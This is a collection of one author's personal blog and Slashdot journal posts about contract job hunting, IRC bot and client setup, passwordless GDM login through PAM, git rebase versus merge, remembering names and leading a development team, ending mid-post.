* Sadly [stackoverflow jobs has been decommissioned](https://meta.stackoverflow.com/questions/415293/sunsetting-jobs-developer-story). ~~<https://stackoverflow.com/jobs?j=contract>~~
### Places to find even more
* <https://www.quora.com/What-are-the-best-job-boards-for-software-engineers>
## Practical tips
- Track everything you've applied to (Trello, or HubSpot if you're feeling rich).
- Keep a copy of the full advert description and rate, they are often taken down before you speak to anyone which weakens your negotiation position.
- Follow up with phone calls after applying - makes you more real, makes it easier for them.
- Track all the businesses in your sector and technology, and their hiring managers and contact them before letting recruiters get in the middle.
- See also my [recruiters page](/recruiters) for defense against the dark arts. Or you could just blanket declare "no recruiters".
## About this post
Someone I know is looking for work (hello!) so rather than just emailing I
thought I'd make a more permanent list of all the places I've come across for
finding work as a contract developer.
For context, I'm a backend developer, specialising in Microsoft ASP.NET / C# &
SQL Server databases, with a smattering of other things (t-shaped people as
they say).
<file_sep>---
layout: post
title: Announcing the Communication Book project
date: '2012-03-21T21:04:00.004Z'
author: <NAME>
tags:
- communication-book
- oss
- java
modified_time: '2012-03-21T21:12:59.474Z'
thumbnail: http://2.bp.blogspot.com/-pMoDVHCIh24/T2pDE3IeGxI/AAAAAAAAAEM/dKiGFEIYC4U/s72-c/screenshot_v0.3-r34.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3479941793818984960
blogger_orig_url: https://timwise.blogspot.com/2012/03/announcing-communication-book-project.html
---

I've been working on a piece of open source software to assist people who have
[aphasia](https://en.wikipedia.org/wiki/Aphasia) (speech difficulties), and it
is now sufficiently functional to be worth mentioning. It's still very rough
around the edges, but if you are on a debian based system you should be able to
easily get it up and running and see what you think. If you are on other
platforms you'll currently need a bit (alright, a lot) of java knowledge to get
this up and running.
If you have the time to help I'd be very grateful. You don't have to be a
coder, just letting me know if it works for you would be great.
If you want to know more or would like to give it a try then please do head
over to the project page at
[http://launchpad.net/communication](http://launchpad.net/communication).
<file_sep>---
layout: post
title: getting supybot to announce new bugzilla bugs
date: '2009-11-16T17:22:00.005Z'
author: <NAME>
tags:
- irc
- howto
- ubuntu
- linux
- bugzilla
- script
- oss
- sys admin
modified_time: '2009-11-17T10:23:25.092Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8826812947380288670
blogger_orig_url: https://timwise.blogspot.com/2009/11/getting-supybot-to-announce-new.html
---
getting supybot to announce new bugzilla bugs - I've just put here the key non-obvious things that tripped me up when trying to set this up.
All done on Ubuntu 8.04.3 LTS
Install [supybot](http://sourceforge.net/projects/supybot/) and the [supybot bugzilla plugin](http://code.google.com/p/supybot-bugzilla/).
Create a system group (supybot) and user (bugbot) to run supybot as.
Set up your supybot configuration file as desired.
Getting supybot to start at startup:
[http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/](http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/)
Here's my modified init script
```
$ cat /etc/init.d/bugbot
#! /bin/sh
#
# supybot init script
# http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/
#
PATH=/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/bin/supybot
NAME=supybot
DESC=supybot
test -f $DAEMON || exit 0
set -e
case "$1" in
start)
echo -n "Starting $DESC: "
start-stop-daemon --start --quiet \
--chuid bugbot --exec $DAEMON -- --daemon /etc/supybot/bugbot.conf
echo "$NAME."
;;
stop)
echo -n "Stopping $DESC: "
start-stop-daemon --stop --quiet \
--oknodo --exec /usr/bin/python
echo "$NAME."
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: $0 {start|stop|restart}" >&2
exit 1
;;
esac
exit 0
```
Set up bugzilla to send a copy of all bugmail to a local address (eg bugbot@localhost), and configure exim4 to accept local mail (as well as smart host delivery), using the mbox format.
sudo dpkg-reconfigure exim4-config
Start a conversation with bugbot, get it to identify you, then set the required configuration by sending it messages (you can also set these in the supybot .conf file for your bot):
config plugins.Bugzilla.mbox /var/mail/bugbot
and
config plugins.Bugzilla.bugzillas.your-bugzilla-name.watchedItems.all True
which will turn on the announcements (i had to read the code to find that one!)
Note that supybot doesn't immediately write config changes to disc.
<file_sep>---
title: "Weekend"
date: 2004-11-08
slashdot_url: https://slashdot.org/journal/89748/weekend
---
<p>Went to Cambridge and relaxed.<br>Was great.</p>
<p><a href="http://www.timwise.co.uk/images/4A5E0007.jpg">photo</a> at top of church tower. (Taken with my new toy<nobr> </nobr>:)</p>
<file_sep>---
title: "bad websites"
date: 2006-03-11
slashdot_url: https://slashdot.org/journal/131064/bad-websites
---
<p>I didn't think this kind of thing still existed, let alone on a commercial site:<br><a href="https://www.mytravelmoney.com/SiteBrowser.htm">https://www.mytravelmoney.com/SiteBrowser.htm</a></p>
<p>So I sent them a rant<nobr> </nobr>:)</p>
<p>---------------<br>To: <EMAIL>; <EMAIL></p>
<p><a href="http://www.goingplaces.co.uk/AniteNextPage.asp?p=HOLIDAYEXTRASHOME&s=162000990">http://www.goingplaces.co.uk/AniteNextPage.asp?p=HOLIDAYEXTRASHOME&s=162000990</a><br><a href="https://www.mytravelmoney.com/SiteBrowser.htm">https://www.mytravelmoney.com/SiteBrowser.htm</a></p>
<p>From your site:</p>
<p>
"The view this site you must use Internet Explorer 5.0 or later.</p>
<p>
You may download the latest version of Internet Explorer from the following URL:</p>
<p>
<a href="http://www.microsoft.com/windows/ie/downloads">http://www.microsoft.com/windows/ie/downloads</a>"</p>
<p>This is unacceptable.</p>
<p>Haven't you heard of Firefox, Opera, Netscape, Mozilla, Lynx, Safari? Or Linux? Or Macs? Or the W3C and the drive for standards? This kind of message makes your site look like it's stuck in the 80's. If you cannot design a site for more than one browser then you shouldn't be designing websites.<br>In case you hadn't guessed, I won't now be buying currency from you.</p>
<file_sep>---
title: "Mr C"
date: 2004-09-21
slashdot_url: https://slashdot.org/journal/84451/mr-c
---
<p>Just had word, James is back in Dorking, and is broke!</p>
<p>Mail him. (hyperjames 2003)</p>
<p>Hello James.</p>
<file_sep>---
title: "bicycles"
date: 2006-03-10
slashdot_url: https://slashdot.org/journal/130984/bicycles
---
<p>BBC News on new highway code:<br><a href="http://news.bbc.co.uk/1/hi/magazine/4789146.stm">http://news.bbc.co.uk/1/hi/magazine/4789146.stm</a></p>
<p>Bad cycle lanes:<br><a href="http://www.warringtoncyclecampaign.co.uk/facility-of-the-month/">http://www.warringtoncyclecampaign.co.uk/facility-of-the-month/</a></p>
<p>Sunglasses mounted mirror:<br><a href="http://icebike.org/Equipment/cyclingmirrors.htm">http://icebike.org/Equipment/cyclingmirrors.htm</a> - skip down to "Take A Look:"</p>
<p>My new favourite bike shop: CycleZone (no real website)<br><a href="http://www.touchreading.com/business/list/bid/3605783">http://www.touchreading.com/business/list/bid/3605783</a></p>
<file_sep>---
title: "Windsurfing"
date: 2004-06-16
slashdot_url: https://slashdot.org/journal/74626/windsurfing
---
<p>Excellent evening out on the lake today.</p>
<p>It's been ages since I was out last on a board, and I was rubbish then! But with a little help from my friends, and a fair breeze I don't think I did too badly.</p>
<p>I don't half ache now.</p>
<p>Cheers for dinner A, much appreciated.</p>
<file_sep>---
layout: post
title: Using Pidgin for IRC
date: '2010-12-15T10:35:00.003Z'
author: <NAME>
tags:
- irc
- open source
- pidgin
modified_time: '2010-12-15T10:39:50.788Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-589107923468491077
blogger_orig_url: https://timwise.blogspot.com/2010/12/using-pidgin-for-irc.html
---
[pidgin](http://pidgin.im/ "http://pidgin.im/") is quite a good irc client.
Once you have downloaded and installed pidgin:
* Accounts > Manage Accounts
* Add...
* Protocol: IRC
* Username: your preferred nickname (please use your real name)
* Server: your irc server, eg irc.freenode.org
* Password - leave blank
* Add
* Close (the "Accounts" window)
Back in the main pidgin window:
* Buddies > Join A Chat...
* Account: the one you just created
* Channel: #favouriteroom, eg #pidgin
* Password - leave blank
* Join
In the new chat window for the chatroom:
* Conversation > Add...
* Tick "Autojoin when account connects."
* Tick "Remain in chat after window is closed."
* Leave everything else as defaults
* Add
Now when pidgin launches you will have "#favouriteroom" in your buddy list, and you can double click to open the chatroom.
You may also want to make pidgin start when windows starts;
From the main window:
* Tools > Plugins
* Tick "Windows Pidgin Options"
* Configure Plugin
* Tick "Start Pidgin on Windows startup"
* Close
* Close (plugin window)
I also recommend enabling the Markerline plugin to help see what is new in the channel.
<file_sep>#!/bin/sh -v
(sleep 3 && xdg-open http://localhost:4000/) &
bundle exec jekyll s --drafts $@
<file_sep>---
title: "Dodgy DELL drivers"
date: 2004-03-17
slashdot_url: https://slashdot.org/journal/65483/dodgy-dell-drivers
---
<p>Came home to find laptop with its fan on full and running at 100% cpu usage. Not good.<br>Culprit process was pctspk.<br>Found that it is related to modem drivers <a href="http://www.liutilities.com/products/wintaskspro/processlibrary/pctspk/">here</a>, and discovered this problem is <a href="http://support.packardbell.dk/pri/index.php?PibItemNr=topic_01895">known</a> to packard bell (shudder).</p>
<p>So I've dropped a support query to DELL. Wait and see time.</p>
<file_sep>---
title: "Morzine"
date: 2004-08-22
slashdot_url: https://slashdot.org/journal/81130/morzine
---
<p>All of the <a href="http://www.t.abell.dsl.pipex.com/photos/morzine_aug04/">Morzine photos</a> are up. [7.83Mb]</p>
<p>Had a top time.</p>
<file_sep>---
title: "swimming"
date: 2004-02-13
slashdot_url: https://slashdot.org/journal/61917/swimming
---
<p>Looks like i'm turning into a fitness phreak. Since I started I have been swimming: Mon eve, Tue am, Wed eve, Thur am, Mon eve, Tue am, Wed eve, Mon eve, Wed eve, Thur am and this evening (Fri).<br>Now I'm knackered. Should be a 'large' weekend though<nobr> </nobr>;)</p>
<file_sep>---
title: "stats"
date: 2004-09-11
slashdot_url: https://slashdot.org/journal/83418/stats
---
<p>Woo!<br>Mandrake, Apache, AWStats, wget, cron, sleepless nights...<br><nobr> </nobr>... and now I have up to date stats for <a href="http://www.timwise.co.uk/">timwise.co.uk</a>, updated automatically overnight every night for the previous day's usage. Including the cubs site.<br>See the stats link bottom right of the home page.</p>
<p>Joy.</p>
<p>Also, I've started signing into ICQ again, and there's a little image on timwise that tells you if I'm online, which is nice. I'm not too keen on the standard icq client any more, but that's ok because I use <a href="http://gaim.sourceforge.net/">GAIM</a> these days, which I can highly recommend. If you can't be bothered with that, you can click on the online img on my site and send me a message through the icq messaging centre, which is quite a cool feature.</p>
<file_sep>---
layout: post
title: Down with SDV! long live SSE!
date: 2017-12-29 02:59:54.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/12/29/down-with-sdv-long-live-sse/"
---
I can't keep up with myself on this startup journey, but I hope I can give you a peek into my journey as I go. I've had couple of revelations recently which I'll explain here:
## Discovering your needs
I've managed to talk to more people about what problems I could solve and have started to learn more about what value this tool might provide (solution-to-problem instead of the usual solution-looking-for-problem).
I had originally thought of this tool as something for viewing data, but I've had several people express an interest in the ability to visualize relationships. This was surprising to me as personally I've been using [SqlHawk](http://timabell.github.io/sqlHawk/) (my fork of [SchemaSpy](http://schemaspy.org/)) to get to grips with database relationships, but I hadn't considered that they don't get widespread use in the circles I move in; presumably due to a mix of awareness and what a pain they are to set up (Java, shudder).
Having explained my vision for the tool to my friend and ex-colleague Ben, I managed to ask him to say in his own words how he might hypothetically describe it to others, and he uttered the magical words: "well it's kind of a schema explorer". And suddenly I understood that the real value of the tool I'm creating is not in the ability to poke around the data per-se, it's actually the ability to come to an unfamiliar relational database and be able to much more quickly understand how it hangs together. (It'll have value in familiar databases too, but I like this focus, it feels higher-value.)
As a result "diagrams" is now the top-priority feature being added to SDV.
It also gives me a new name for Sql Data Viewer...
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/24405997637/" title="IMG_20171219_160643"><img src="https://live.staticflickr.com/4731/24405997637_bda2d45a93.jpg" width="500" height="276" alt="IMG_20171219_160643"></a>
</div>
## New name, new domain
The product has been renamed to **Sql Schema Explorer**, which can now be found on the shiny new domain [schemaexplorer.io](http://schemaexplorer.io)
For the new website:
* I've given up on all the [fancy wordpress designs and hosting](http://blog.timwise.co.uk/2017/10/22/choosing-wordpress-hosting-for-a-new-idea/) I was using for the old domain and have gone for [github pages](https://pages.github.com/).
* All the bloated css and javascript is gone, leaving nothing but a [hand-crafted flat html](https://github.com/timabell/sdv-website/blob/master/index.html) file that should load beautifully on any connection thanks to being under 1kb of content in total with no trackers or external resources.
* It should reliably render on most devices with minimal CPU load or delay thanks to the lack of bloated and fragile javascript / device detection etc.
* I've ditched the fancy drip sign-up form in favour of a simple email link (why solve the volume problem when I don't have it yet?).
* I've ditched the google analytics tracker because it's a vanity metric if it's not money in the bank; and these trackers have hidden costs (page load time, leaking your customer's data to google etc). If I get a sudden influx I can just ask them how they found me rather than reading between the digital lines.
* I've stripped the content back to almost the bare minimum to try and drive focus towards email signups so that I can then engage in-depth through that. I need enough that I can point people at it in conversation to get them signed up. I only need a dozen early customers to help me shape the product so I don't need to optimize for complete strangers who've never heard of me yet.
* I've created my own personal style of design that favours minimalistic css and markup to keep page load fast and complexity down whilst still giving structure to the message and a little bit of easiness on the eye (e.g. off-white/black, read the css if you like). I'll be continuing to [improve my design skills](https://designacademy.io/) as I work on this project, though I'm not against outsourcing when I need to.
## Money, money, money
You may remember I wrote about [making SDV free](http://blog.timwise.co.uk/2017/11/17/why-sdv-could-be-a-billion-dollar-business/) not too long ago. With the above new understanding about the value that the product can provide and what it will take to build a full-featured product for that market I am no longer concerned about being immediately copied, and think it has sufficient value to be a viable product in its own right. As such I will be charging for it after all.
I'll be following the great advice from the episode of [Startup Chat - 268: Encore Episode – How to Get Your First 10 Customers](https://thestartupchat.com/ep268/) that I heard recently (highly recommend this if you're also thinking of getting a startup / side-project off the ground).
The starting price point will be £150 per single user/machine. This is based on the "3x the first number you think of" formula because I think they are right that first instinct is off; after-all I have to make this a viable business otherwise development will stop and no-one wins.
I'll be offering the recommended money-back guarantee for my first customers; that way I can prove that there is real value in what I'm creating whilst maintaining my high ethical standards for fairness in business.
## Still here?
Great! Thanks so much for reading this. If you're interested in keeping up to date or being involved in the early life of this new product then head over to [schemaexplorer.io](http://schemaexplorer.io) and sign up!
<file_sep>---
title: "sooooo long"
date: 2003-12-03
slashdot_url: https://slashdot.org/journal/53994/sooooo-long
---
<p>Twenty Eight Days till they're out of my life.</p>
<p>>:(</p>
<p><a href="http://dictionary.reference.com/search?r=2&q=treachery">Treachery</a></p>
<file_sep>---
title: "article: micro$oft battles for survival of office"
date: 2005-11-10
slashdot_url: https://slashdot.org/journal/121807/article-microoft-battles-for-survival-of-office
---
<p>Microsoft is in real danger of losing its office monopoly, which is currently perpetuated by the "I need office to send files to so and so" argument.</p>
<p><a href="http://searchopensource.techtarget.com/originalContent/0,289142,sid39_gci1144104,00.html">http://searchopensource.techtarget.com/originalContent/0,289142,sid39_gci1144104,00.html</a></p>
<file_sep>---
title: Tips for remembering names
layout: post
---
## The Tips
### Tip #1
📝 When being introduced to everyone in an office, take the time to make a quick note in a notepad. Name + role.
- 👹Fear: not making eye contact, being rude.
- 😇 Reality: people really appreciate that you care enough about them to make the extra effort.
### Tip #2
Use their name immediately.
"Hi Angela!"
### Tip #3
Pair them mentally with someone you know with the same name, perhaps someone famous. Imagine them stood together.
Any kind of visual image that helps you jump from face to name no matter how silly.
### Tip #4
Make an effort to get the pronunciation *precisely" right, especially with names from languages with sounds that don't exist in your native tongue.
People appreciate that you actually want to get it right and it's an excuse to repeat it lots while looking at their face.
### Tip #5
Attempt use their name when you see them next.
Swallow your fear of looking like an idiot / being uncaring.
There's nothing like the horror and embarrassment of being corrected bluntly to sear the right name into your reptilian brain.
I did this twice yesterday 🙊🙈, sorry!
### Tip #6
Mentally rehearse and reinforce the name-to-face pairing both ways.
Name -> face (or distinguishing features)
Face -> Name + role + interests
### Tip #7
Practice recall over time:
- immediately (oh hi Ishmel)
- In 5 mins (hmm so Heather is a coder from 1st floor)
- 10 mins
- half hour
- 2 hours
- 6 hrs
- 1 day
- 2 days
- 4 days
- 1 week
- etc
### Tip #8
Chat to them on teams / slack / email etc where the tech shows full names and hopefully profile pics too.
### Tip #9
Try and recall, when you can't then refer to your list of names from the office intros.
### Tip #10
When a new name pops up add it to your physical notebook with a person symbol in the margin so you can scan for them.
### Tip #11
Put them in your phone address book, use tags and notes to associate them with where you met them (neighbour, job at X, works at Y)
### Tip #12
Take the time to rewrite your rough list of names into a tidier and organised list.
### Tip #13
Go and coffee with them individually and learn about them, their history and what excites them.
It turns them into a human with depth and feelings in your brain instead of a lifeless fact to remember.
### Tip #14
Ask the group in a meeting if they wouldn't mind starting with a round of intros. (Or ask the meeting organiser / chair to include that.)
Make notes when they do. None of us can remember 15 names & faces in one go.
Don't be afraid to interrupt if you miss one, it shows caring.
### Tip #15
Use *any* excuse to use people's names
- when they are there
- without them
- with other
- privately
- verbally
- in writing
### Tip #16
Ignore your fear of getting their name wrong.
Better to try, fail and improve than to be stuck not knowing. Time heals all.
### Tip #17
Don't be afraid to screw up names more than once.
Most people can empathise and are also afraid.
### Tip #18
Show empathy by repeating your own name to help them learn without fear.
### Tip #19
Visibly lead by example by using names a lot with others - to help everyone learn new names.
Hopefully others will follow suit. (I'm not sure this actually works, let me know!)
### Tip #20
Don't be afraid to actually *look* directly at their face and the rest of them.
It's hard to remember a face that you haven't actually seen.
Sometimes there's social dynamics that make it *really* hard to look someone in the face.
## My journey to better
I too was terrified of this. I just quietly held the shame & failure of not knowing names I'd been told. Memory isn't my forté.
One day I just thought why am I avoiding this, all I can do is try and be better. So from then on I resolved to put my fears aside and just do my best.
As a contract coder who has to learn 40+ new names on a regular basis this has been a huge improvement for me, and I continue to both fail and improve.
I have zero regrets for taking the risk and trying to be better, including the many many failures.
The best thing about deciding to try harder is that even if I utterly fail remembering someones name it's really obvious that they really appreciate the fact that I'm trying, that I care enough about them to to want to know who they are and treat them as a real person, and that I take the time to learn more about them than just an email address.
I've accepted that my human brain only has limited ability and I'm sorry to say I've forgotten hundreds, maybe thousands of names in my 22 years of work.
We all have these limitations to a greater or lesser extent, so when I fail I get empathy and usually a correction. Not one person has expressed annoyance with me.
I still value and honour my time with all those people, whether I remember names or not.
## What about you?
How do you approach remembering names?
Do you risk it or do you avoid it altogether?
What tips and experiences can you share?
## Sleepless nights
This post started as a [series of tweets](https://twitter.com/tim_abell/status/1527109721429315586) when I woke up in the small hours thinking about it. Do add your thoughts there if you're a twitter kinda person.
<file_sep>---
layout: post
title: password-free ubuntu login with facebrowser
date: '2008-12-18T21:27:00.002Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
modified_time: '2009-04-04T00:31:35.019Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7416804086430204798
blogger_orig_url: https://timwise.blogspot.com/2008/12/password-free-ubuntu-login-with.html
---
If you trust everyone who has physical access to a pc (if not then you are
encrypting your files, right?) then there seems little point in having to type
a password just because more than one user uses the pc.
So here's how to log in from the gdm "face browser" with a single click.
Instructions tested with Ubuntu 8.04 Hardy Heron and 8.10 Intrepid Ibex.
As root, create a new file containing the usernames of all the users you want
be able to log in through gdm without entering a password:
sudo -i
echo 'username' >> /etc/gdm/nopassusers
now still as root modify the pam settings for gdm to check this file and allow this user in based on being in the list:
vi /etc/pam.d/gdm
and modify to contain the new listfile item
#%PAM-1.0
auth requisite pam_nologin.so
auth required pam_env.so readenv=1
auth required pam_env.so readenv=1 envfile=/etc/default/locale
**auth sufficient pam_listfile.so item=user sense=allow file=/etc/gdm/nopassusers onerr=fail** #add this line
@include common-auth
auth optional pam_gnome_keyring.so
@include common-account
session required pam_limits.so
@include common-session
session optional pam_gnome_keyring.so auto_start
@include common-password
now simply restart gdm (or the whole machine) and try your new one-click login
/etc/init.d/gdm restart
# Notes
This means the keyring isn't unlocked, so you may have to type in your password anyway before your wireless connects.
# References
* [http://mirror.hamakor.org.il/archives/linux-il/05-2004/10149.html](http://mirror.hamakor.org.il/archives/linux-il/05-2004/10149.html)
* [http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/sag-pam_listfile.html](http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/sag-pam_listfile.html)
<file_sep>---
title: "microsoft office clipart"
date: 2005-09-06
slashdot_url: https://slashdot.org/journal/116467/microsoft-office-clipart
---
<p>take a look at <a href="http://office.microsoft.com/clipart/preview.aspx?AssetID=MMj0309727&Query=j0309727&Scope=MC,MM,MP,MS&CTT=1&Origin=EC790000121033&QueryID=p918HLJml&AssetCol=MMj0309727">this clipart preview</a>.</p>
<p>Don't know why it's interesting (cough), b3ta.com pointed it out.</p>
<file_sep>---
title: Should you rebase or merge to update feature branches in git?
layout: post
---
You have a "feature branch" in git that you've been working on for a while but
now `main` or `master` has moved on. You know of `merge` and `rebase`, but
which one should you use? And what can you do to avoid being in this position
in the first-place?
## TLDR
Try rebase. If that dissolves into conflict-resolution-hell then give up, merge
master into your branch and move on.
## The Options
You need to bring your feature branch up to date with with master to flush
out any incompatibilities and deal with any merge conflicts.
You have two common choices:
* **Merge** `origin/master` into your branch.
* **Rebase** your branch onto `origin/master` and force-push.
## The Trade-offs
A blanket rule here either for merge or rebase is unhelpful because there are
**trade-offs** to be made that vary depending on the specific circumstances. (Isn't
that always the answer with git?! "It depends!")
### Should You Merge?
A merge from `master` is done like this:
```
git fetch
git merge origin/master
git push
```
#### Merge - The Good
* 👍 Reliable no-brainer that anyone can follow by rote.
* 👍 Resolve conflicts only once.
* 👍 Accurate representation of what happened over time.
* 👍 Avoids retrospectively [introducing bugs and test failures into commits that
used to be
valid](https://medium.com/@fredrikmorken/why-you-should-stop-using-git-rebase-5552bee4fed1).
* 👍 Avoids re-writing previously shared branch, which can confuse less
experienced git users if they are working with you on the branch.
#### Merge - The Bad
* 👎 Doing this repeatedly makes for a messy history for little or no benefit.
* 👎 Significant merges from master makes it harder/impossible to then go back and
clean your branch's commits with a `git rebase --interactive`.
* 👎 Tends to generate [wide tramlines in the commit
history](https://hackernoon.com/git-merge-vs-rebase-whats-the-diff-76413c117333)
that can be very hard to follow when looking back to find out when/why
something was done. (mitigated by `git log --first-parent`, until
you need to dig into a branch).
### Should You Rebase?
A rebase onto master is done like this:
```
git fetch
git rebase origin/master
git push --force-with-lease
```
#### Rebase - The Good
* 👍 Avoids tramlines generated by long-lived feature branches
branch
* 👍 Makes resultant history in `master` much easier to follow
* 👍 Reflects the intention more clearly of "merge these commits into master" as
opposed to "here's how I flailed my way to a working thing"
#### Rebase - The Bad
* 👎 Can confuse less experienced git users if they are working with you on the
branch (the answer is usually for them to run `git pull --rebase`)
* 👎 Results in [resolving conflicts multiple times (screencast)](https://youtu.be/5b-vNpSw6R8)
* 👎 Loses chronological order of creation of code (personally I think this is
less important than a series of clean intentional patches to be applied to
the codebase when merged to `master`)
* 👎 Could in somewhat rare circumstances retrospectively [introduce bugs and test
failures into commits that used to be
valid](https://medium.com/@fredrikmorken/why-you-should-stop-using-git-rebase-5552bee4fed1)
## Heuristics To Use
Try rebase. If that dissolves into conflict-resolution-hell then give up, merge
master into your branch and move on.
> "Try rebase. If that dissolves into conflict-resolution-hell then give up,
> merge master into your branch and move on."
>
> ~ <NAME>
>
> [Tweet this](https://twitter.com/intent/tweet?text=%E2%80%9CTry%20rebase.%20If%20that%20dissolves%20into%20conflict-resolution-hell%20then%20give%20up%2C%20merge%20master%20into%20your%20branch%20and%20move%20on.%E2%80%9D%20~%20%40timabell%20%F0%9F%91%89%20https%3A%2F%2Ftimwise.co.uk%2F2019%2F10%2F14%2Fmerge-vs-rebase)
Rebase is my preferred approach until:
* Rebase becomes too costly to fix up due to conflicts with `master`, or
* I become aware of an incompatibility with `master` that changes the meaning
of the previous commits and needs serious work to resolve.
You *can* usually make a difficult rebase work, and I've hunkered down and
tackled probably more than I should have in the name of perfect history graphs.
The problem with a tricky rebase is that if you are doing this for business and
not just for fun then there is a major time cost for only a marginal benefit.
## How to make it through rebase conflicts unscathed
If you decide to battle on with rebase in-spite of conflicts then my tip for
you is:
Don't jump straight to the "correct" code when fixing each commit's conflict,
as that guarantees the next commit won't apply.
Instead as you work through the rebase make each commit apply with its original
meaning and nothing more.
It's worth remembering that each commit on your branch describes how to change
the source code from a before-state to an after-state; so if you change the
after-state of one patch, then the next patch will no longer apply.
## How to avoid the pain of rebases and merges entirely
Pain around this topic is likely a symptom of not breaking down your stories /
pull requests / features into small enough chunks. On a fast moving team
`master` is very fluid and any large & long-running branches will be hard to
review and merge. Try to chip off smaller increments and ship those, maybe
using feature flags or hidden features (those with no visible way of getting to
them).
## More Resources
In general merge vs rebase generates much debate, such as that found on
stackoverflow:
<https://stackoverflow.com/questions/804115/when-do-you-use-git-rebase-instead-of-git-merge>
but it is often lacking context.
There are many other articles on the merge/rebase topic such as
<https://derekgourlay.com/blog/git-when-to-merge-vs-when-to-rebase/> but I
couldn't see anything that matched my heuristic for tackling feature branch
updates so I wrote this one.
"[Semantic merge conflicts](https://bors.tech/essay/2017/02/02/pitch/)" are where git reports no conflict but nonetheless the code is broken.
I also wrote "[GitHub rebase and squash considered harmful](/2021/03/15/github-rebase-and-squash-considered-harmful/)" which address a github specific horror.
## Get in touch
Hey there! Thanks for reading!
This post gets far more traffic than anything else on my blog. I'd love to know what brought you here and if the above was helpful.
Please take a moment to fire an email to me at [<EMAIL>](mailto:<EMAIL>?subject=merge-rebase-article) and tell me a bit about yourself.
<file_sep>---
title: "more raucous laughter"
date: 2005-05-17
slashdot_url: https://slashdot.org/journal/107007/more-raucous-laughter
---
<p><a href="http://www.turnoffyourtv.com/international/bbc.havealifead.jpg">http://www.turnoffyourtv.com/international/bbc.havealifead.jpg</a></p>
<p>my sentiments precisely</p>
<file_sep>---
title: "bluetooth headset & old pc with new cable modem"
date: 2003-11-22
slashdot_url: https://slashdot.org/journal/52940/bluetooth-headset-old-pc-with-new-cable-modem
---
<p>Hello my loyal fanbase. (of me reading my own journal - hello me).</p>
<p>Voice dialling seems to be working on my headset now. Woo. Still not sure it's acting quite how it should.</p>
<p>Fixed internet connection on my P800. Turned off secure thingy in the connection settings. All started working again. (Wonder if that's bad?)<br>Used about 1/4 Mb today, but thanks to fone tariff obfuscation I have no idea what that cost me.</p>
<p>the old pc....<br>A's got cable installed now. How do I download a firewall? I connect the unprotected pc to the internet! Aarggh. Stressful. Getting there now.<br>Should have brought my install disks with me. Never mind.</p>
<p>T.</p>
<file_sep>---
title: Being a development team lead
layout: post
---
Here's my take on what it means to be a dev-lead / tech-lead / lead developer; and why it's time I stepped up.
I'm going to explain what I think makes for a really good high-functioning dev team, and how to get there along with links to essential reading on the subject.
As always contributions and thoughts welcome, drop me a line. If you want me to help with your team just shout. I love to just chat with people about their challenges in digital delivery, whether or not I end up becoming part of the project.
I'm also going to say why I think it's time I shifted *my* contracting focus from individual contributor to being a lead dev for teams.
## How to be an excellent lead dev
Having worked under many team leaders of all types I have a pretty good idea of what's pleasant and effective. And I'm glad to say that being a nice human being to be around is a big part of being a great leader. Dictatorial, unpleasant and command-and-control leadership are just not the right tool for running complex digital delivery projects
### Servant-leader
The best leaders I've come across are almost deceptively non-leader-like. This is because our culture in the west (hello press, television and film) portrays "leaders" as hard-ass bullies who get the best out of an organisation by ordering people around, knowing all the answers like some kind of god and generally being unpleasant. The reality is that the best leaders don't lead by intimidation, they lead by example, lead by being humble, lead by coaching (see below) and know that relationships and trust are what really matter for teams that can ship and respond to problems.
### Culture of trust
Everyone in the team is doing the best they can with the knowledge and circumstances they have. We can all help each other get better with trust and a good dose of [nonviolent communication](https://www.amazon.co.uk/Nonviolent-Communication-Marshall-Rosenberg/dp/1591791707).
### Openness with all
[Make things open: it makes things better](https://www.gov.uk/guidance/government-design-principles#make-things-open-it-makes-things-better).
I've always thought it best that anyone in the organisation who is interested can see every last detail of what we're working on, right down to the code. This does of course require a culture of trust, but if that's missing there are deeper problems to be solved.
There are of course some things that need to be protected such as production keys and the personal data of users.
As an example I ran an end-of-sprint demo for a client with all the major stakeholders present for an important project. The demo consisted of a "red screen of death", which showed that we had been unable to get a particular piece of technology with which the team was unfamiliar to work even after a whole sprint on it. Once the shock of the blunt honesty subsided the senior stakeholders were able to see that something needed to be done to ensure success and helped us recruit an external consultant with expertise in that particular technology. From there on things went much more smoothly. If we hadn't demoed our "failure" then there was a real risk that the senior stakeholders would have mistakenly thinking everything was fine and now action was needed, which would likely have resulted in a complete failure of the project to deliver. Some people seem to like to always paint a positive picture to their seniors (the RAG reports that are always yellow until it's too late to fix anything and they finally all go red, as they people go and get new jobs elsewhere...).
### Setting the standards
Nobody wants bugs, unmaintainable spaghetti code, regressions due to missing test coverage. But how do you achieve this in a collaborative positive way? Just demanding it be so is ineffective and builds resentment.
No team is perfect. No software is perfect. There is only "better", "worse" and different tradeoffs between different pressures on system design and human behaviour. So we should strive for the best, bring the team with us, and accept that we are all flawed human beings with an inability to simultaneously keep in our heads every constraint and piece of the system. In fact software is largely written and architected the way it is *because* even the best human brains have limited capacity for knowledge of a system. Managing complexity and coping gracefully with humans being human is an important part of the puzzle.
I see the push towards today and tomorrow's "best practice" more as giving permission to the team to strive for it than enforcing. Most developers I know want to be and do the absolute best they can. When team output doesn't meet some criteria (such as test coverage) these are some possible reasons that I'd look at. I'd use the ordering below so that we can assume good faith until proven wrong. I definitely wouldn't start with confrontation or accusation. Assuming the best does not mean giving up powers of last resort should all other options be exhausted, but that would be the last option. Filtering for great people on the way in is much better than undoing poor selection once the team is up and running.
